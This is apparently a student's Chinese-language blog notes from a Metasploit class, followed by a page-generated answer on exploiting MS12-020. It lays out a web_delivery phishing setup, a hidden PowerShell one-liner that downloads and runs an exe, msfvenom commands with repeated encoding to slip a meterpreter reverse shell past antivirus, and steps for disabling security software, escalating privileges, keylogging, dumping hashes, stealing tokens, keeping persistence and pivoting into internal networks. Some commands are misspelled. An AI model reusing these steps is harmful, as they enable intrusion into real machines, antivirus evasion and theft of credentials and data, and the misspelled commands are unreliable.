MSF day12

复习昨天的内容 毕竟我没有认真听

msf宏钓鱼

1.先进msf控制台:msfconsle  clear

2.search web_delivery

3.use 1         options

4.show targets

5.set target 2

6.options

7.set payload windows/x64/meterpreter/reverse_tcp

9.set lhost kali     回车ip set lport 1121   回车     run

10.用生成好的命令交给被攻击的cmd 或者powershell

11.结束后老大的补充

长度或者其他不明情况不能正常运行run出来的代码

就使用下面这张图的命令运行

poweshell -w hidden -nop IEX (New Obeject Net WebClient) DownloadString ("")run里面的网址

这个网址其实是一个exe下载的网址

ps:windows CMD 的清屏命令cls

补充的防护问题:

shell.exe

个人租的阿里云的服务器vps可以使用这个方法

安全狗也行 

360不行 360需要老大教的其他方法

今天的正式讲课 免杀

5.0基本废了

一般用最新的 5.020年就废了

360 火绒可能还能过        win10 自带防火墙 最难

所以老大不讲了因为作用基本不大了

要用的话看看下图就行

老师的示例:

这张图过后使用options

然后

然后run

然后show evasion

捆绑免杀

shellter免杀

官网免费版下好后启动之后这样操作:

好了之后如下图:

L回车

1

输入ip 和 端口 实战使用 公网ip

然后msf开启侦听 如下图

 

然后老大开始实战 发现360没发现

但是创建新用户360发现了

另一种免杀利用python 在编码免杀失效和这个一起使用

老大这样写的不知道为什么    

第一张图这样写 似乎是反复增强免杀效果 反复编码

msfvenon -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1121 -b "x00" -e  x86shikata_ga_na -i 20 | msfvenom -a x86 --platform windows  -e x86/alpha_upper -i 10 -f exe -o shell2.exe

第二个这样写

 msfvenon -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1121 -b "x00" -e  x86shikata_ga_na -i 10 -f py -o msf.py

然后生成好的msf.py

,模板覆盖到如下图所示文件当中

之后将文件复制到如图的地方

pythoninstaller  msf.py

这个步骤是将 刚刚准备好的模板 弄成 cmd识别出来的命令

然后安杀毒软件实验免杀效果 老大说很玄学 有的杀毒过不了  有的杀毒可能就过得了

gihub的免杀方法

ps:-help列出来的模块不一定全能用 一是因为你的权限 二是你连接的操作系统

MSF后渗透模块深入

第一个自动迁移最好不要用 最好手动迁移 不然可能会降权

关杀软进程很难 一般我们用服务关360

!!!停止服务后需要重启 重启对方电脑之前需要权限维持!!

后渗透模块基本命令操作

run post/ 看有哪些提取信息的功能可以百度

然后后面可以跟给你列v出来的功能 run post/........

可以upload上传提权文件

注意 用linux斜杠/    windows斜杠要\\很麻烦

run VNC怎么修改只读 而是能移动桌面

102行添加 如下图

老大改的有点问题 以后我要用自己找找方法吧

其它基本命令参数

run getgui -e 失败怎么办?

先查看权限   getuid

然后开始提权

search suggest  看提权模块

会帮你把这个电脑缺的漏洞全都给你列举出来

然后如下操作

use3 

 set session 1

run

然后如下操作


然后再次 set session 1

show targets


然后能查找所有文件 我们就要开始寻找这些文件

除了提权另一种方法开启3389端口 cmd命令

摄像头命令

端口转发

内网开了3389  我们在外面该怎么办

建立隧道

然后如下图 然后 yes 就可以远程桌面了

外网远程连接桌面 开隧道

物理机直接通过kali kaili通过隧道 隧道 到 win7

物理机打开远程桌面 连接kali的1138端口 看到的不是 kali界面 而是被黑入的win7界面

另一个例子

现在

和win7处于同一个内网的80.128的服务器 开了80端口 ip地址是80.128现在我们该黑这个电脑

1.通过后渗透模块 将80.128的80 端口转发在我们kali的81上 

这样 访问我们的81 就相当于访问80.128

又或者 它开了一个445的端口 我们用nmap扫描 发现这个端口有ms17-010漏洞

然后可以端口转发到我们本地 我们打我们自己相当于打他

补充 :只要win7能访问到 内网的一些服务器的端口就可以使用端口转发

shell网络环境 分析被黑电脑有没有其他网络 然后访问其他内网

小ps 

不需要

键盘记录

Hash获取

提示用另一个 这是针对32位的 如下

下图权限不够提示

2012以上不能读明文

抓包嗅探

盗取令牌 盗取用户身份 提权

安装后门持久控制服务器 建议CS 我不经常用 这个就是权限维持

权限维持推荐方法:

上面3个绕过检测  的方法也有 以后讲  用CS

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MS12-020是远程桌面协议(RDP)中的一个漏洞,它可以允许攻击者通过发送恶意的RDP数据包来执行远程代码。MSF(Metasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。 以下是利用MS12-020漏洞的步骤: 1. 首先,需要使用Metasploit框架。如果你还没有安装它,请先到官网下载并安装。 2. 打开Metasploit框架控制台,输入以下命令: ``` use auxiliary/scanner/rdp/ms12_020_check ``` 这个命令将会检查目标是否存在MS12-020漏洞。 3. 如果目标存在漏洞,可以使用以下命令进行攻击: ``` use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> exploit ``` 这个命令将会执行一个拒绝服务攻击,导致目标系统崩溃。这个攻击不会导致目标系统被入侵或数据被窃取,但是可以影响系统的可用性。 4. 如果你想要执行更危险的攻击,可以使用以下命令: ``` use exploit/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <attacker IP address> exploit ``` 这个命令将会执行一个远程代码执行攻击,使用Meterpreter反向Shell连接到目标系统。这个攻击可以让攻击者完全控制目标系统,包括执行任意命令、窃取数据等。 需要注意的是,利用漏洞进行攻击是非法的,只能在授权的环境下进行测试。同时,这个漏洞已经被修复,建议尽快更新你的系统以避免被攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值